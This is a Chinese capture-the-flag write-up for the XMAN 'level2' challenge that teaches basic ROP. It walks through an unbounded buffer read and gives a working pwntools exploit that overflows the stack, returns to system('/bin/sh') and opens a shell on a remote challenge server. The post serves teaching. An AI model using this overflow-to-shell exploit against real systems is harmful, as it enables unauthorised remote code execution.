这是XMAN上之前比赛的一道题，还是挺简单的，ROP的基本入门使用。

首先可以看到的是，程序的代码很少，main函数中只调用了一个vulnerable_function()和一个system()。F5看一下：

确实没有发现其他函数，进入vulnerable_function()函数：

在这里我们看到了一个buf[]，然后没有其他内容了，没有对输入做任何限制，这也是为什么我们一开始输入大量的无效字符程序依然没有任何问题。

查看一下程序的strings，可能会有其他有用的内容：

我们看到了system和/bin/sh，这是解出题目的关键。
我们可以构造一个system("/bin/sh")的伪栈帧，vulnerable_function()执行结束后返回到我们构造的伪栈帧去执行system("bin/sh")，这样就可以获取shell。（需要注意一点，因为我们的目的是通过system("bin/sh")来获取shell，所以函数执行完后的返回地址可以任意。）

    #! /usr/bin/env python
    # -*- coding:utf-8 -*-
    from pwn import *
    context.log_level = 'debug'

    elf = ELF('./level2')
    sys_addr = elf.symbols['system']
    sh_addr = elf.search('/bin/sh').next()

    payload = 'A' * (0x88 + 0x4) + p32(sys_addr) +     p32(0xdeadbeef) + p32(sh_addr)

    io = remote('111.198.29.45',45800)
    io.sendlineafter("Input:\n",payload)
    io.interactive()
    io.close()

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)